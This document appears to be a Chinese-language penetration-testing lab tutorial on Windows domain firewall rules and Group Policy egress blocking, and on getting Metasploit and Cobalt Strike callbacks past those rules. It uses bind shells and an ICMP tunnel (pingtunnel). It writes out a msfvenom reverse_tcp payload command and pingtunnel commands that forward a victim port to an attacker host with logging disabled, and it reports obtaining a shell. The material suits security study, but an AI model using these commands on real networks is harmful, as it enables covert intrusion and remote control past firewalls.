第123天：内网安全-域防火墙入站出站规则不出网隧道上线组策略对象同步

目录

案例一： 单机-防火墙-限制端口\协议出入站

案例二：不出网的解决思路

入站连接

隧道技术

案例三：域控-防火墙-组策略对象同步

案例四：域控-防火墙-组策略不出网上线

msf

cs

---

案例一： 单机-防火墙-限制端口\协议出入站

入站是指别人主动来连接/访问你

在一个单机系统当中只启动一个共用防火墙，剩下都关闭

启动网站服务，当这个启动的时候，curl访问网站失败

而当关闭入站连接的时候，网站又会重现显示，这是入站的时候被阻止了

而出站是自己主动的去访问别人，windows防火墙出站默认是允许的

这里制作一个msf木马进行上传

msf开启监听

不设置规则的时候这个时候运行木马是可以进行连接的

设置一个出站限制

设置端口

设置规则

设置应用的防火墙范围

设置名称

这个时候运行没有任何反应

这样也只是禁用了一个端口，假如别人用的是4444端口，这里尝试修改禁止所有端口出站

自然就无法连接msf了

案例二：不出网的解决思路

入站连接

出站被限制死了，但是入站没有，可以主动连接木马

采用 windows/meterpreter/bind_tcp就是主动进行正向连接(入站)

生成正向连接的木马进行上传

设置模块，以及远程地址，运行木马，等待正向链接

隧道技术

限制了tcp协议，但是这些协议是向下兼容的，限制了tcp，也并非就限制了网络层以下类似icmp等协议

这里设置禁用所有tcp协议

去访问百度的时候会发现，浏览器无法访问，但是可以ping通

因为浏览器走的协议是http协议，而ping协议走的是icmp协议，所以隧道的思路就是把tcp协议利用icmp等等别的协议进行出网转发

案例三：域控-防火墙-组策略对象同步

在域控主机中打开组策略管理

找到域然后新建连接

配置该连接，右键点击配置

配置防火墙策略，域，专用，公用全部设置开启

域内主机，防火墙初始状态

更新组策略的命令

gpupdate/force

现在主机状态

也可以采用重启或者强制进行重置

配置禁止出网的规则

三个网络都配置，命名为no

尝试更新

案例四：域控-防火墙-组策略不出网上线

两种情况

这里目前是有网络，但是tcp封杀第二种情况，用的隧道技术

msf

首先先生成一个msf木马，生成的时候把地址设置为127.0.0.1，反弹给自己的3333端口

msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 -f exe -o msf.exe

设置msf进行监听

这里需要把3333端口通过icmp协议转发到这个攻击主机的4444端口用到的项目地址

GitHub - esrrhs/pingtunnel: Pingtunnel is a tool that send TCP/UDP traffic over ICMP

下载这两个版本

linux传到攻击主机，windows传到被控主机

kali开启隧道用来接收别人通过icmp传给自己的，传过来将其又转换为tcp端口(sudo权限)

sudo ./pingtunnel -type server

windows被控主机开启工具，将自己的3333端口监听发送给攻击主机的4444端口（需要管理员权限）noprint nolog是指不要输出日志

pingtunnel.exe -type client -l 127.0.0.1:3333 -s 192.168.172.132 -t 192.168.172.132:4444 -tcp 1 -noprint 1 -nolog 1

这个时候再运行木马，成功上线

cs

设置反弹给自己的监听模块

利用这个监听器生成一个木马

再设置一个接收反弹信息的监听器

 windows通过icmp反弹5555端口

kali开启隧道

运行木马，成功反弹shell